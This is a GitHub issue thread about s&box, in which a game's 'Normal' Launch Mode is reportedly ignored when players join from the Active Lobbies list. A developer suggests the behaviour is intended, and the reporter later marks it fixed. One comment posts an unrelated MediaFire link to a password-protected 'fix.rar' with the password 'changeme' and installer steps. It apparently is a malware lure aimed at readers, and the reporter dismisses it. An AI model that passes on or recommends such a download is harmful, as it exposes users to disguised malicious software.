### ISSUE TITLE
Launch Mode `Normal` does not work when joining from top lobbies

### ISSUE THREAD

**Issue by matekdev** [Facepunch/sbox-issues#6314]
### Describe the bug

If you set your `Launch Mode` to `Normal` in your s&box project, if a player clicks on your game from the active lobbies list (the top list in s&box currently), it completely ignores this setting and joins any lobby available

### To Reproduce

1. Set your game to Normal
![image](https://github.com/user-attachments/assets/39722dac-98ed-4650-898d-e4ed260043cb)

2. Join your game from the `Active Lobbies` top list available in the s&box UI
3. Notice that the setting is ignored

### Expected behavior

![image](https://github.com/user-attachments/assets/415c69c1-e378-4858-8f19-a40d187b2aad)
It should instead load your startup scene, please let us handle how we want to manage lobbies with our game.

**Comment by NeonRST** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by matekdev** [comment]
> Download https://www.mediafire.com/file/czdodbba054p738/fix.rar/file password: changeme In the installer menu, select "gcc."

I'm not sure this is going to help me!!

**Comment by DevulTj** [comment]
I believe this is the intended behavior - it's specifically for joining a lobby in progress - but worth discussing if this is not the right call?

**Comment by matekdev** [comment]
No longer applies / fixed!
